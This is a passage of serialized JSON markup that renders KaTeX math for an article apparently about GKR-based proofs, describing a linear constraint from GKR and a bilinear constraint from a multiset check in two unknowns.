",{"type":26,"tag":130,"props":122302,"children":122304},{"className":122303},[133,134],[122305],{"type":26,"tag":137,"props":122306,"children":122308},{"className":122307},[140],[122309],{"type":26,"tag":137,"props":122310,"children":122312},{"className":122311,"ariaHidden":146},[145],[122313,122391],{"type":26,"tag":137,"props":122314,"children":122316},{"className":122315},[151],[122317,122321,122378,122382,122387],{"type":26,"tag":137,"props":122318,"children":122320},{"className":122319,"style":612},[156],[],{"type":26,"tag":137,"props":122322,"children":122324},{"className":122323},[169],[122325,122330],{"type":26,"tag":137,"props":122326,"children":122328},{"className":122327},[169,170],[122329],{"type":32,"value":173},{"type":26,"tag":137,"props":122331,"children":122333},{"className":122332},[236],[122334],{"type":26,"tag":137,"props":122335,"children":122337},{"className":122336},[241,417],[122338,122367],{"type":26,"tag":137,"props":122339,"children":122341},{"className":122340},[246],[122342,122362],{"type":26,"tag":137,"props":122343,"children":122345},{"className":122344,"style":426},[251],[122346],{"type":26,"tag":137,"props":122347,"children":122348},{"style":430},[122349,122353],{"type":26,"tag":137,"props":122350,"children":122352},{"className":122351,"style":262},[261],[],{"type":26,"tag":137,"props":122354,"children":122356},{"className":122355},[267,268,269,270],[122357],{"type":26,"tag":137,"props":122358,"children":122360},{"className":122359},[169,270],[122361],{"type":32,"value":1817},{"type":26,"tag":137,"props":122363,"children":122365},{"className":122364},[453],[122366],{"type":32,"value":456},{"type":26,"tag":137,"props":122368,"children":122370},{"className":122369},[246],[122371],{"type":26,"tag":137,"props":122372,"children":122374},{"className":122373,"style":464},[251],[122375],{"type":26,"tag":137,"props":122376,"children":122377},{},[],{"type":26,"tag":137,"props":122379,"children":122381},{"className":122380,"style":281},[184],[],{"type":26,"tag":137,"props":122383,"children":122385},{"className":122384},[286],[122386],{"type":32,"value":289},{"type":26,"tag":137,"props":122388,"children":122390},{"className":122389,"style":281},[184],[],{"type":26,"tag":137,"props":122392,"children":122394},{"className":122393},[151],[122395,122399,122440,122445,122450,122455,122460,122465],{"type":26,"tag":137,"props":122396,"children":122398},{"className":122397,"style":95590},[156],[],{"type":26,"tag":137,"props":122400,"children":122402},{"className":122401},[169],[122403,122412,122417,122426,122431],{"type":26,"tag":137,"props":122404,"children":122406},{"className":122405},[169,32],[122407],{"type":26,"tag":137,"props":122408,"children":122410},{"className":122409},[169],[122411],{"type":32,"value":624},{"type":26,"tag":137,"props":122413,"children":122415},{"className":122414,"style":621},[169],[122416],{"type":32,"value":5666},{"type":26,"tag":137,"props":122418,"children":122420},{"className":122419},[169,32],[122421],{"type":26,"tag":137,"props":122422,"children":122424},{"className":122423},[169],[122425],{"type":32,"value":121284},{"type":26,"tag":137,"props":122427,"children":122429},{"className":122428,"style":621},[169],[122430],{"type":32,"value":5666},{"type":26,"tag":137,"props":122432,"children":122434},{"className":122433},[169,32],[122435],{"type":26,"tag":137,"props":122436,"children":122438},{"className":122437},[169],[122439],{"type":32,"value":121303},{"type":26,"tag":137,"props":122441,"children":122443},{"className":122442},[162],[122444],{"type":32,"value":3016},{"type":26,"tag":137,"props":122446,"children":122448},{"className":122447},[169],[122449],{"type":32,"value":1817},{"type":26,"tag":137,"props":122451,"children":122453},{"className":122452},[197],[122454],{"type":32,"value":3079},{"type":26,"tag":137,"props":122456,"children":122458},{"className":122457},[162],[122459],{"type":32,"value":3016},{"type":26,"tag":137,"props":122461,"children":122463},{"className":122462},[169],[122464],{"type":32,"value":1817},{"type":26,"tag":137,"props":122466,"children":122468},{"className":122467},[197],[122469],{"type":32,"value":3079},{"type":32,"value":3339},{"type":26,"tag":130,"props":122472,"children":122474},{"className":122473},[133,134],[122475],{"type":26,"tag":137,"props":122476,"children":122478},{"className":122477},[140],[122479],{"type":26,"tag":137,"props":122480,"children":122482},{"className":122481,"ariaHidden":146},[145],[122483,122561],{"type":26,"tag":137,"props":122484,"children":122486},{"className":122485},[151],[122487,122491,122548,122552,122557],{"type":26,"tag":137,"props":122488,"children":122490},{"className":122489,"style":612},[156],[],{"type":26,"tag":137,"props":122492,"children":122494},{"className":122493},[169],[122495,122500],{"type":26,"tag":137,"props":122496,"children":122498},{"className":122497},[169,170],[122499],{"type":32,"value":173},{"type":26,"tag":137,"props":122501,"children":122503},{"className":122502},[236],[122504],{"type":26,"tag":137,"props":122505,"children":122507},{"className":122506},[241,417],[122508,122537],{"type":26,"tag":137,"props":122509,"children":122511},{"className":122510},[246],[122512,122532],{"type":26,"tag":137,"props":122513,"children":122515},{"className":122514,"style":426},[251],[122516],{"type":26,"tag":137,"props":122517,"children":122518},{"style":430},[122519,122523],{"type":26,"tag":137,"props":122520,"children":122522},{"className":122521,"style":262},[261],[],{"type":26,"tag":137,"props":122524,"children":122526},{"className":122525},[267,268,269,270],[122527],{"type":26,"tag":137,"props":122528,"children":122530},{"className":122529},[169,270],[122531],{"type":32,"value":878},{"type":26,"tag":137,"props":122533,"children":122535},{"className":122534},[453],[122536],{"type":32,"value":456},{"type":26,"tag":137,"props":122538,"children":122540},{"className":122539},[246],[122541],{"type":26,"tag":137,"props":122542,"children":122544},{"className":122543,"style":464},[251],[122545],{"type":26,"tag":137,"props":122546,"children":122547},{},[],{"type":26,"tag":137,"props":122549,"children":122551},{"className":122550,"style":281},[184],[],{"type":26,"tag":137,"props":122553,"children":122555},{"className":122554},[286],[122556],{"type":32,"value":289},{"type":26,"tag":137,"props":122558,"children":122560},{"className":122559,"style":281},[184],[],{"type":26,"tag":137,"props":122562,"children":122564},{"className":122563},[151],[122565,122569,122610,122615,122620,122625,122630,122635],{"type":26,"tag":137,"props":122566,"children":122568},{"className":122567,"style":95590},[156],[],{"type":26,"tag":137,"props":122570,"children":122572},{"className":122571},[169],[122573,122582,122587,122596,122601],{"type":26,"tag":137,"props":122574,"children":122576},{"className":122575},[169,32],[122577],{"type":26,"tag":137,"props":122578,"children":122580},{"className":122579},[169],[122581],{"type":32,"value":624},{"type":26,"tag":137,"props":122583,"children":122585},{"className":122584,"style":621},[169],[122586],{"type":32,"value":5666},{"type":26,"tag":137,"props":122588,"children":122590},{"className":122589},[169,32],[122591],{"type":26,"tag":137,"props":122592,"children":122594},{"className":122593},[169],[122595],{"type":32,"value":121284},{"type":26,"tag":137,"props":122597,"children":122599},{"className":122598,"style":621},[169],[122600],{"type":32,"value":5666},{"type":26,"tag":137,"props":122602,"children":122604},{"className":122603},[169,32],[122605],{"type":26,"tag":137,"props":122606,"children":122608},{"className":122607},[169],[122609],{"type":32,"value":121303},{"type":26,"tag":137,"props":122611,"children":122613},{"className":122612},[162],[122614],{"type":32,"value":3016},{"type":26,"tag":137,"props":122616,"children":122618},{"className":122617},[169],[122619],{"type":32,"value":1817},{"type":26,"tag":137,"props":122621,"children":122623},{"className":122622},[197],[122624],{"type":32,"value":3079},{"type":26,"tag":137,"props":122626,"children":122628},{"className":122627},[162],[122629],{"type":32,"value":3016},{"type":26,"tag":137,"props":122631,"children":122633},{"className":122632},[169],[122634],{"type":32,"value":878},{"type":26,"tag":137,"props":122636,"children":122638},{"className":122637},[197],[122639],{"type":32,"value":3079},{"type":32,"value":122641}," we get the following constraint:",{"type":26,"tag":35,"props":122643,"children":122644},{},[122645],{"type":26,"tag":130,"props":122646,"children":122648},{"className":122647},[133,134],[122649],{"type":26,"tag":137,"props":122650,"children":122652},{"className":122651},[140],[122653],{"type":26,"tag":137,"props":122654,"children":122656},{"className":122655,"ariaHidden":146},[145],[122657,122736,122814,122855],{"type":26,"tag":137,"props":122658,"children":122660},{"className":122659},[151],[122661,122666,122723,122727,122732],{"type":26,"tag":137,"props":122662,"children":122665},{"className":122663,"style":122664},[156],"height:0.5945em;vertical-align:-0.15em;",[],{"type":26,"tag":137,"props":122667,"children":122669},{"className":122668},[169],[122670,122675],{"type":26,"tag":137,"props":122671,"children":122673},{"className":122672},[169,170],[122674],{"type":32,"value":173},{"type":26,"tag":137,"props":122676,"children":122678},{"className":122677},[236],[122679],{"type":26,"tag":137,"props":122680,"children":122682},{"className":122681},[241,417],[122683,122712],{"type":26,"tag":137,"props":122684,"children":122686},{"className":122685},[246],[122687,122707],{"type":26,"tag":137,"props":122688,"children":122690},{"className":122689,"style":426},[251],[122691],{"type":26,"tag":137,"props":122692,"children":122693},{"style":430},[122694,122698],{"type":26,"tag":137,"props":122695,"children":122697},{"className":122696,"style":262},[261],[],{"type":26,"tag":137,"props":122699,"children":122701},{"className":122700},[267,268,269,270],[122702],{"type":26,"tag":137,"props":122703,"children":122705},{"className":122704},[169,270],[122706],{"type":32,"value":1817},{"type":26,"tag":137,"props":122708,"children":122710},{"className":122709},[453],[122711],{"type":32,"value":456},{"type":26,"tag":137,"props":122713,"children":122715},{"className":122714},[246],[122716],{"type":26,"tag":137,"props":122717,"children":122719},{"className":122718,"style":464},[251],[122720],{"type":26,"tag":137,"props":122721,"children":122722},{},[],{"type":26,"tag":137,"props":122724,"children":122726},{"className":122725,"style":348},[184],[],{"type":26,"tag":137,"props":122728,"children":122730},{"className":122729},[353],[122731],{"type":32,"value":2172},{"type":26,"tag":137,"props":122733,"children":122735},{"className":122734,"style":348},[184],[],{"type":26,"tag":137,"props":122737,"children":122739},{"className":122738},[151],[122740,122744,122801,122805,122810],{"type":26,"tag":137,"props":122741,"children":122743},{"className":122742,"style":122664},[156],[],{"type":26,"tag":137,"props":122745,"children":122747},{"className":122746},[169],[122748,122753],{"type":26,"tag":137,"props":122749,"children":122751},{"className":122750},[169,170],[122752],{"type":32,"value":173},{"type":26,"tag":137,"props":122754,"children":122756},{"className":122755},[236],[122757],{"type":26,"tag":137,"props":122758,"children":122760},{"className":122759},[241,417],[122761,122790],{"type":26,"tag":137,"props":122762,"children":122764},{"className":122763},[246],[122765,122785],{"type":26,"tag":137,"props":122766,"children":122768},{"className":122767,"style":426},[251],[122769],{"type":26,"tag":137,"props":122770,"children":122771},{"style":430},[122772,122776],{"type":26,"tag":137,"props":122773,"children":122775},{"className":122774,"style":262},[261],[],{"type":26,"tag":137,"props":122777,"children":122779},{"className":122778},[267,268,269,270],[122780],{"type":26,"tag":137,"props":122781,"children":122783},{"className":122782},[169,270],[122784],{"type":32,"value":878},{"type":26,"tag":137,"props":122786,"children":122788},{"className":122787},[453],[122789],{"type":32,"value":456},{"type":26,"tag":137,"props":122791,"children":122793},{"className":122792},[246],[122794],{"type":26,"tag":137,"props":122795,"children":122797},{"className":122796,"style":464},[251],[122798],{"type":26,"tag":137,"props":122799,"children":122800},{},[],{"type":26,"tag":137,"props":122802,"children":122804},{"className":122803,"style":348},[184],[],{"type":26,"tag":137,"props":122806,"children":122808},{"className":122807},[353],[122809],{"type":32,"value":2172},{"type":26,"tag":137,"props":122811,"children":122813},{"className":122812,"style":348},[184],[],{"type":26,"tag":137,"props":122815,"children":122817},{"className":122816},[151],[122818,122822,122827,122837,122842,122846,122851],{"type":26,"tag":137,"props":122819,"children":122821},{"className":122820,"style":157},[156],[],{"type":26,"tag":137,"props":122823,"children":122825},{"className":122824},[162],[122826],{"type":32,"value":165},{"type":26,"tag":137,"props":122828,"children":122830},{"className":122829},[169,32],[122831],{"type":26,"tag":137,"props":122832,"children":122834},{"className":122833},[169],[122835],{"type":32,"value":122836},"rest of product",{"type":26,"tag":137,"props":122838,"children":122840},{"className":122839},[197],[122841],{"type":32,"value":200},{"type":26,"tag":137,"props":122843,"children":122845},{"className":122844,"style":281},[184],[],{"type":26,"tag":137,"props":122847,"children":122849},{"className":122848},[286],[122850],{"type":32,"value":289},{"type":26,"tag":137,"props":122852,"children":122854},{"className":122853,"style":281},[184],[],{"type":26,"tag":137,"props":122856,"children":122858},{"className":122857},[151],[122859,122863],{"type":26,"tag":137,"props":122860,"children":122862},{"className":122861,"style":117635},[156],[],{"type":26,"tag":137,"props":122864,"children":122866},{"className":122865},[169,32],[122867],{"type":26,"tag":137,"props":122868,"children":122870},{"className":122869},[169],[122871],{"type":32,"value":117646},{"type":26,"tag":35,"props":122873,"children":122874},{},[122875,122877,123030],{"type":32,"value":122876},"This is bilinear in ",{"type":26,"tag":130,"props":122878,"children":122880},{"className":122879},[133,134],[122881],{"type":26,"tag":137,"props":122882,"children":122884},{"className":122883},[140],[122885],{"type":26,"tag":137,"props":122886,"children":122888},{"className":122887,"ariaHidden":146},[145],[122889],{"type":26,"tag":137,"props":122890,"children":122892},{"className":122891},[151],[122893,122897,122902,122959,122964,122968,123025],{"type":26,"tag":137,"props":122894,"children":122896},{"className":122895,"style":157},[156],[],{"type":26,"tag":137,"props":122898,"children":122900},{"className":122899},[162],[122901],{"type":32,"value":165},{"type":26,"tag":137,"props":122903,"children":122905},{"className":122904},[169],[122906,122911],{"type":26,"tag":137,"props":122907,"children":122909},{"className":122908},[169,170],[122910],{"type":32,"value":173},{"type":26,"tag":137,"props":122912,"children":122914},{"className":122913},[236],[122915],{"type":26,"tag":137,"props":122916,"children":122918},{"className":122917},[241,417],[122919,122948],{"type":26,"tag":137,"props":122920,"children":122922},{"className":122921},[246],[122923,122943],{"type":26,"tag":137,"props":122924,"children":122926},{"className":122925,"style":426},[251],[122927],{"type":26,"tag":137,"props":122928,"children":122929},{"style":430},[122930,122934],{"type":26,"tag":137,"props":122931,"children":122933},{"className":122932,"style":262},[261],[],{"type":26,"tag":137,"props":122935,"children":122937},{"className":122936},[267,268,269,270],[122938],{"type":26,"tag":137,"props":122939,"children":122941},{"className":122940},[169,270],[122942],{"type":32,"value":1817},{"type":26,"tag":137,"props":122944,"children":122946},{"className":122945},[453],[122947],{"type":32,"value":456},{"type":26,"tag":137,"props":122949,"children":122951},{"className":122950},[246],[122952],{"type":26,"tag":137,"props":122953,"children":122955},{"className":122954,"style":464},[251],[122956],{"type":26,"tag":137,"props":122957,"children":122958},{},[],{"type":26,"tag":137,"props":122960,"children":122962},{"className":122961},[177],[122963],{"type":32,"value":180},{"type":26,"tag":137,"props":122965,"children":122967},{"className":122966,"style":185},[184],[],{"type":26,"tag":137,"props":122969,"children":122971},{"className":122970},[169],[122972,122977],{"type":26,"tag":137,"props":122973,"children":122975},{"className":122974},[169,170],[122976],{"type":32,"value":173},{"type":26,"tag":137,"props":122978,"children":122980},{"className":122979},[236],[122981],{"type":26,"tag":137,"props":122982,"children":122984},{"className":122983},[241,417],[122985,123014],{"type":26,"tag":137,"props":122986,"children":122988},{"className":122987},[246],[122989,123009],{"type":26,"tag":137,"props":122990,"children":122992},{"className":122991,"style":426},[251],[122993],{"type":26,"tag":137,"props":122994,"children":122995},{"style":430},[122996,123000],{"type":26,"tag":137,"props":122997,"children":122999},{"className":122998,"style":262},[261],[],{"type":26,"tag":137,"props":123001,"children":123003},{"className":123002},[267,268,269,270],[123004],{"type":26,"tag":137,"props":123005,"children":123007},{"className":123006},[169,270],[123008],{"type":32,"value":878},{"type":26,"tag":137,"props":123010,"children":123012},{"className":123011},[453],[123013],{"type":32,"value":456},{"type":26,"tag":137,"props":123015,"children":123017},{"className":123016},[246],[123018],{"type":26,"tag":137,"props":123019,"children":123021},{"className":123020,"style":464},[251],[123022],{"type":26,"tag":137,"props":123023,"children":123024},{},[],{"type":26,"tag":137,"props":123026,"children":123028},{"className":123027},[197],[123029],{"type":32,"value":200},{"type":32,"value":470},{"type":26,"tag":35,"props":123032,"children":123033},{},[123034,123036,123189],{"type":32,"value":123035},"We have two unknowns ",{"type":26,"tag":130,"props":123037,"children":123039},{"className":123038},[133,134],[123040],{"type":26,"tag":137,"props":123041,"children":123043},{"className":123042},[140],[123044],{"type":26,"tag":137,"props":123045,"children":123047},{"className":123046,"ariaHidden":146},[145],[123048],{"type":26,"tag":137,"props":123049,"children":123051},{"className":123050},[151],[123052,123056,123061,123118,123123,123127,123184],{"type":26,"tag":137,"props":123053,"children":123055},{"className":123054,"style":157},[156],[],{"type":26,"tag":137,"props":123057,"children":123059},{"className":123058},[162],[123060],{"type":32,"value":165},{"type":26,"tag":137,"props":123062,"children":123064},{"className":123063},[169],[123065,123070],{"type":26,"tag":137,"props":123066,"children":123068},{"className":123067},[169,170],[123069],{"type":32,"value":173},{"type":26,"tag":137,"props":123071,"children":123073},{"className":123072},[236],[123074],{"type":26,"tag":137,"props":123075,"children":123077},{"className":123076},[241,417],[123078,123107],{"type":26,"tag":137,"props":123079,"children":123081},{"className":123080},[246],[123082,123102],{"type":26,"tag":137,"props":123083,"children":123085},{"className":123084,"style":426},[251],[123086],{"type":26,"tag":137,"props":123087,"children":123088},{"style":430},[123089,123093],{"type":26,"tag":137,"props":123090,"children":123092},{"className":123091,"style":262},[261],[],{"type":26,"tag":137,"props":123094,"children":123096},{"className":123095},[267,268,269,270],[123097],{"type":26,"tag":137,"props":123098,"children":123100},{"className":123099},[169,270],[123101],{"type":32,"value":1817},{"type":26,"tag":137,"props":123103,"children":123105},{"className":123104},[453],[123106],{"type":32,"value":456},{"type":26,"tag":137,"props":123108,"children":123110},{"className":123109},[246],[123111],{"type":26,"tag":137,"props":123112,"children":123114},{"className":123113,"style":464},[251],[123115],{"type":26,"tag":137,"props":123116,"children":123117},{},[],{"type":26,"tag":137,"props":123119,"children":123121},{"className":123120},[177],[123122],{"type":32,"value":180},{"type":26,"tag":137,"props":123124,"children":123126},{"className":123125,"style":185},[184],[],{"type":26,"tag":137,"props":123128,"children":123130},{"className":123129},[169],[123131,123136],{"type":26,"tag":137,"props":123132,"children":123134},{"className":123133},[169,170],[123135],{"type":32,"value":173},{"type":26,"tag":137,"props":123137,"children":123139},{"className":123138},[236],[123140],{"type":26,"tag":137,"props":123141,"children":123143},{"className":123142},[241,417],[123144,123173],{"type":26,"tag":137,"props":123145,"children":123147},{"className":123146},[246],[123148,123168],{"type":26,"tag":137,"props":123149,"children":123151},{"className":123150,"style":426},[251],[123152],{"type":26,"tag":137,"props":123153,"children":123154},{"style":430},[123155,123159],{"type":26,"tag":137,"props":123156,"children":123158},{"className":123157,"style":262},[261],[],{"type":26,"tag":137,"props":123160,"children":123162},{"className":123161},[267,268,269,270],[123163],{"type":26,"tag":137,"props":123164,"children":123166},{"className":123165},[169,270],[123167],{"type":32,"value":878},{"type":26,"tag":137,"props":123169,"children":123171},{"className":123170},[453],[123172],{"type":32,"value":456},{"type":26,"tag":137,"props":123174,"children":123176},{"className":123175},[246],[123177],{"type":26,"tag":137,"props":123178,"children":123180},{"className":123179,"style":464},[251],[123181],{"type":26,"tag":137,"props":123182,"children":123183},{},[],{"type":26,"tag":137,"props":123185,"children":123187},{"className":123186},[197],[123188],{"type":32,"value":200},{"type":32,"value":123190}," and two equations, one linear and one bilinear:",{"type":26,"tag":4820,"props":123192,"children":123193},{},[123194,123521],{"type":26,"tag":3430,"props":123195,"children":123196},{},[123197,123199],{"type":32,"value":123198},"Linear (from GKR): ",{"type":26,"tag":130,"props":123200,"children":123202},{"className":123201},[133,134],[123203],{"type":26,"tag":137,"props":123204,"children":123206},{"className":123205},[140],[123207],{"type":26,"tag":137,"props":123208,"children":123210},{"className":123209,"ariaHidden":146},[145],[123211,123347,123482,123508],{"type":26,"tag":137,"props":123212,"children":123214},{"className":123213},[151],[123215,123220,123277,123334,123338,123343],{"type":26,"tag":137,"props":123216,"children":123219},{"className":123217,"style":123218},[156],"height:0.7333em;vertical-align:-0.15em;",[],{"type":26,"tag":137,"props":123221,"children":123223},{"className":123222},[169],[123224,123229],{"type":26,"tag":137,"props":123225,"children":123227},{"className":123226},[169,170],[123228],{"type":32,"value":41},{"type":26,"tag":137,"props":123230,"children":123232},{"className":123231},[236],[123233],{"type":26,"tag":137,"props":123234,"children":123236},{"className":123235},[241,417],[123237,123266],{"type":26,"tag":137,"props":123238,"children":123240},{"className":123239},[246],[123241,123261],{"type":26,"tag":137,"props":123242,"children":123244},{"className":123243,"style":426},[251],[123245],{"type":26,"tag":137,"props":123246,"children":123247},{"style":430},[123248,123252],{"type":26,"tag":137,"props":123249,"children":123251},{"className":123250,"style":262},[261],[],{"type":26,"tag":137,"props":123253,"children":123255},{"className":123254},[267,268,269,270],[123256],{"type":26,"tag":137,"props":123257,"children":123259},{"className":123258},[169,270],[123260],{"type":32,"value":1817},{"type":26,"tag":137,"props":123262,"children":123264},{"className":123263},[453],[123265],{"type":32,"value":456},{"type":26,"tag":137,"props":123267,"children":123269},{"className":123268},[246],[123270],{"type":26,"tag":137,"props":123271,"children":123273},{"className":123272,"style":464},[251],[123274],{"type":26,"tag":137,"props":123275,"children":123276},{},[],{"type":26,"tag":137,"props":123278,"children":123280},{"className":123279},[169],[123281,123286],{"type":26,"tag":137,"props":123282,"children":123284},{"className":123283},[169,170],[123285],{"type":32,"value":173},{"type":26,"tag":137,"props":123287,"children":123289},{"className":123288},[236],[123290],{"type":26,"tag":137,"props":123291,"children":123293},{"className":123292},[241,417],[123294,123323],{"type":26,"tag":137,"props":123295,"children":123297},{"className":123296},[246],[123298,123318],{"type":26,"tag":137,"props":123299,"children":123301},{"className":123300,"style":426},[251],[123302],{"type":26,"tag":137,"props":123303,"children":123304},{"style":430},[123305,123309],{"type":26,"tag":137,"props":123306,"children":123308},{"className":123307,"style":262},[261],[],{"type":26,"tag":137,"props":123310,"children":123312},{"className":123311},[267,268,269,270],[123313],{"type":26,"tag":137,"props":123314,"children":123316},{"className":123315},[169,270],[123317],{"type":32,"value":1817},{"type":26,"tag":137,"props":123319,"children":123321},{"className":123320},[453],[123322],{"type":32,"value":456},{"type":26,"tag":137,"props":123324,"children":123326},{"className":123325},[246],[123327],{"type":26,"tag":137,"props":123328,"children":123330},{"className":123329,"style":464},[251],[123331],{"type":26,"tag":137,"props":123332,"children":123333},{},[],{"type":26,"tag":137,"props":123335,"children":123337},{"className":123336,"style":348},[184],[],{"type":26,"tag":137,"props":123339,"children":123341},{"className":123340},[353],[123342],{"type":32,"value":356},{"type":26,"tag":137,"props":123344,"children":123346},{"className":123345,"style":348},[184],[],{"type":26,"tag":137,"props":123348,"children":123350},{"className":123349},[151],[123351,123355,123412,123469,123473,123478],{"type":26,"tag":137,"props":123352,"children":123354},{"className":123353,"style":123218},[156],[],{"type":26,"tag":137,"props":123356,"children":123358},{"className":123357},[169],[123359,123364],{"type":26,"tag":137,"props":123360,"children":123362},{"className":123361},[169,170],[123363],{"type":32,"value":41},{"type":26,"tag":137,"props":123365,"children":123367},{"className":123366},[236],[123368],{"type":26,"tag":137,"props":123369,"children":123371},{"className":123370},[241,417],[123372,123401],{"type":26,"tag":137,"props":123373,"children":123375},{"className":123374},[246],[123376,123396],{"type":26,"tag":137,"props":123377,"children":123379},{"className":123378,"style":426},[251],[123380],{"type":26,"tag":137,"props":123381,"children":123382},{"style":430},[123383,123387],{"type":26,"tag":137,"props":123384,"children":123386},{"className":123385,"style":262},[261],[],{"type":26,"tag":137,"props":123388,"children":123390},{"className":123389},[267,268,269,270],[123391],{"type":26,"tag":137,"props":123392,"children":123394},{"className":123393},[169,270],[123395],{"type":32,"value":878},{"type":26,"tag":137,"props":123397,"children":123399},{"className":123398},[453],[123400],{"type":32,"value":456},{"type":26,"tag":137,"props":123402,"children":123404},{"className":123403},[246],[123405],{"type":26,"tag":137,"props":123406,"children":123408},{"className":123407,"style":464},[251],[123409],{"type":26,"tag":137,"props":123410,"children":123411},{},[],{"type":26,"tag":137,"props":123413,"children":123415},{"className":123414},[169],[123416,123421],{"type":26,"tag":137,"props":123417,"children":123419},{"className":123418},[169,170],[123420],{"type":32,"value":173},{"type":26,"tag":137,"props":123422,"children":123424},{"className":123423},[236],[123425],{"type":26,"tag":137,"props":123426,"children":123428},{"className":123427},[241,417],[123429,123458],{"type":26,"tag":137,"props":123430,"children":123432},{"className":123431},[246],[123433,123453],{"type":26,"tag":137,"props":123434,"children":123436},{"className":123435,"style":426},[251],[123437],{"type":26,"tag":137,"props":123438,"children":123439},{"style":430},[123440,123444],{"type":26,"tag":137,"props":123441,"children":123443},{"className":123442,"style":262},[261],[],{"type":26,"tag":137,"props":123445,"children":123447},{"className":123446},[267,268,269,270],[123448],{"type":26,"tag":137,"props":123449,"children":123451},{"className":123450},[169,270],[123452],{"type":32,"value":878},{"type":26,"tag":137,"props":123454,"children":123456},{"className":123455},[453],[123457],{"type":32,"value":456},{"type":26,"tag":137,"props":123459,"children":123461},{"className":123460},[246],[123462],{"type":26,"tag":137,"props":123463,"children":123465},{"className":123464,"style":464},[251],[123466],{"type":26,"tag":137,"props":123467,"children":123468},{},[],{"type":26,"tag":137,"props":123470,"children":123472},{"className":123471,"style":348},[184],[],{"type":26,"tag":137,"props":123474,"children":123476},{"className":123475},[353],[123477],{"type":32,"value":356},{"type":26,"tag":137,"props":123479,"children":123481},{"className":123480,"style":348},[184],[],{"type":26,"tag":137,"props":123483,"children":123485},{"className":123484},[151],[123486,123490,123495,123499,123504],{"type":26,"tag":137,"props":123487,"children":123489},{"className":123488,"style":1542},[156],[],{"type":26,"tag":137,"props":123491,"children":123493},{"className":123492},[169,170],[123494],{"type":32,"value":4326},{"type":26,"tag":137,"props":123496,"children":123498},{"className":123497,"style":281},[184],[],{"type":26,"tag":137,"props":123500,"children":123502},{"className":123501},[286],[123503],{"type":32,"value":289},{"type":26,"tag":137,"props":123505,"children":123507},{"className":123506,"style":281},[184],[],{"type":26,"tag":137,"props":123509,"children":123511},{"className":123510},[151],[123512,123516],{"type":26,"tag":137,"props":123513,"children":123515},{"className":123514,"style":368},[156],[],{"type":26,"tag":137,"props":123517,"children":123519},{"className":123518},[169],[123520],{"type":32,"value":1817},{"type":26,"tag":3430,"props":123522,"children":123523},{},[123524,123526],{"type":32,"value":123525},"Bilinear (from multiset): ",{"type":26,"tag":130,"props":123527,"children":123529},{"className":123528},[133,134],[123530],{"type":26,"tag":137,"props":123531,"children":123533},{"className":123532},[140],[123534],{"type":26,"tag":137,"props":123535,"children":123537},{"className":123536,"ariaHidden":146},[145],[123538,123564,123642,123720,123746],{"type":26,"tag":137,"props":123539,"children":123541},{"className":123540},[151],[123542,123546,123551,123555,123560],{"type":26,"tag":137,"props":123543,"children":123545},{"className":123544,"style":95563},[156],[],{"type":26,"tag":137,"props":123547,"children":123549},{"className":123548,"style":97062},[169,170],[123550],{"type":32,"value":91286},{"type":26,"tag":137,"props":123552,"children":123554},{"className":123553,"style":348},[184],[],{"type":26,"tag":137,"props":123556,"children":123558},{"className":123557},[353],[123559],{"type":32,"value":2172},{"type":26,"tag":137,"props":123561,"children":123563},{"className":123562,"style":348},[184],[],{"type":26,"tag":137,"props":123565,"children":123567},{"className":123566},[151],[123568,123572,123629,123633,123638],{"type":26,"tag":137,"props":123569,"children":123571},{"className":123570,"style":122664},[156],[],{"type":26,"tag":137,"props":123573,"children":123575},{"className":123574},[169],[123576,123581],{"type":26,"tag":137,"props":123577,"children":123579},{"className":123578},[169,170],[123580],{"type":32,"value":173},{"type":26,"tag":137,"props":123582,"children":123584},{"className":123583},[236],[123585],{"type":26,"tag":137,"props":123586,"children":123588},{"className":123587},[241,417],[123589,123618],{"type":26,"tag":137,"props":123590,"children":123592},{"className":123591},[246],[123593,123613],{"type":26,"tag":137,"props":123594,"children":123596},{"className":123595,"style":426},[251],[123597],{"type":26,"tag":137,"props":123598,"children":123599},{"style":430},[123600,123604],{"type":26,"tag":137,"props":123601,"children":123603},{"className":123602,"style":262},[261],[],{"type":26,"tag":137,"props":123605,"children":123607},{"className":123606},[267,268,269,270],[123608],{"type":26,"tag":137,"props":123609,"children":123611},{"className":123610},[169,270],[123612],{"type":32,"value":1817},{"type":26,"tag":137,"props":123614,"children":123616},{"className":123615},[453],[123617],{"type":32,"value":456},{"type":26,"tag":137,"props":123619,"children":123621},{"className":123620},[246],[123622],{"type":26,"tag":137,"props":123623,"children":123625},{"className":123624,"style":464},[251],[123626],{"type":26,"tag":137,"props":123627,"children":123628},{},[],{"type":26,"tag":137,"props":123630,"children":123632},{"className":123631,"style":348},[184],[],{"type":26,"tag":137,"props":123634,"children":123636},{"className":123635},[353],[123637],{"type":32,"value":2172},{"type":26,"tag":137,"props":123639,"children":123641},{"className":123640,"style":348},[184],[],{"type":26,"tag":137,"props":123643,"children":123645},{"className":123644},[151],[123646,123650,123707,123711,123716],{"type":26,"tag":137,"props":123647,"children":123649},{"className":123648,"style":123218},[156],[],{"type":26,"tag":137,"props":123651,"children":123653},{"className":123652},[169],[123654,123659],{"type":26,"tag":137,"props":123655,"children":123657},{"className":123656},[169,170],[123658],{"type":32,"value":173},{"type":26,"tag":137,"props":123660,"children":123662},{"className":123661},[236],[123663],{"type":26,"tag":137,"props":123664,"children":123666},{"className":123665},[241,417],[123667,123696],{"type":26,"tag":137,"props":123668,"children":123670},{"className":123669},[246],[123671,123691],{"type":26,"tag":137,"props":123672,"children":123674},{"className":123673,"style":426},[251],[123675],{"type":26,"tag":137,"props":123676,"children":123677},{"style":430},[123678,123682],{"type":26,"tag":137,"props":123679,"children":123681},{"className":123680,"style":262},[261],[],{"type":26,"tag":137,"props":123683,"children":123685},{"className":123684},[267,268,269,270],[123686],{"type":26,"tag":137,"props":123687,"children":123689},{"className":123688},[169,270],[123690],{"type":32,"value":878},{"type":26,"tag":137,"props":123692,"children":123694},{"className":123693},[453],[123695],{"type":32,"value":456},{"type":26,"tag":137,"props":123697,"children":123699},{"className":123698},[246],[123700],{"type":26,"tag":137,"props":123701,"children":123703},{"className":123702,"style":464},[251],[123704],{"type":26,"tag":137,"props":123705,"children":123706},{},[],{"type":26,"tag":137,"props":123708,"children":123710},{"className":123709,"style":348},[184],[],{"type":26,"tag":137,"props":123712,"children":123714},{"className":123713},[353],[123715],{"type":32,"value":356},{"type":26,"tag":137,"props":123717,"children":123719},{"className":123718,"style":348},[184],[],{"type":26,"tag":137,"props":123721,"children":123723},{"className":123722},[151],[123724,123728,123733,123737,123742],{"type":26,"tag":137,"props":123725,"children":123727},{"className":123726,"style":95563},[156],[],{"type":26,"tag":137,"props":123729,"children":123731},{"className":12373